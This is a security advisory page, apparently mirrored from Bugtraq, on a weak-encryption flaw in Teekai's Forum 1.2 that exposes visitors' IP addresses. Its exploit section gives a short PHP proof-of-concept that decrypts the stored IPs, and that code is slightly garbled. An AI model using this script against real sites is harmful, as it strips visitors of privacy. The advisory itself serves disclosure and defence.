Teekai's Forum Weak Visitor IP Address Encryption Vulnerability

BID:4926

Info

Teekai's Forum Weak Visitor IP Address Encryption Vulnerability

Bugtraq ID: 4926
Class: Design Error
CVE:
Remote: Yes
Local: No
Published: Jun 03 2002 12:00AM
Updated: Jun 03 2002 12:00AM
Credit: Credited to frog frog <[email protected]>.
Vulnerable: Teekai Forum 1.2
Not Vulnerable:

Discussion

Teekai's Forum Weak Visitor IP Address Encryption Vulnerability

Teekai's Forum employs weak encryption of web usage statistics. This may enable a remote attacker to gain unauthorized access to sensitive information such as the IP addresses of visitors to a site running the Forum software.

Exploit / POC

Teekai's Forum Weak Visitor IP Address Encryption Vulnerability

The following PHP script was provided to decrypt to visitor IP addresses:

<? $$cryptedip = explode(' ', $cryptedip); $$key = md5("20"); $$trueip = $$cryptedip[0]/$key.".".$cryptedip[1]/$key.".".$cryptedip[2]/$key.".".$cryptedip[3]/$key; echo "Result: $$trueip "; >

Solution / Fix

Teekai's Forum Weak Visitor IP Address Encryption Vulnerability

Solution:
Currently we are not aware of any vendor-supplied patches for this issue. If you feel we are in error or are aware of more recent information, please mail us at: [email protected] <mailto:[email protected]>.

References

Teekai's Forum Weak Visitor IP Address Encryption Vulnerability

References:

© CVE.report 2026

Use of this information constitutes acceptance for use in an AS IS condition. There are NO warranties, implied or otherwise, with regard to this information or its use. Any use of this information is at the user's risk. It is the responsibility of user to evaluate the accuracy, completeness or usefulness of any information, opinion, advice or other content. EACH USER WILL BE SOLELY RESPONSIBLE FOR ANY consequences of his or her direct or indirect use of this web site. ALL WARRANTIES OF ANY KIND ARE EXPRESSLY DISCLAIMED. This site will NOT BE LIABLE FOR ANY DIRECT, INDIRECT or any other kind of loss.

CVE, CWE, and OVAL are registred trademarks of The MITRE Corporation and the authoritative source of CVE content is MITRE's CVE web site. This site includes MITRE data granted under the following license.

Free CVE JSON API cve.report/api

CVE.report and Source URL Uptime Status status.cve.report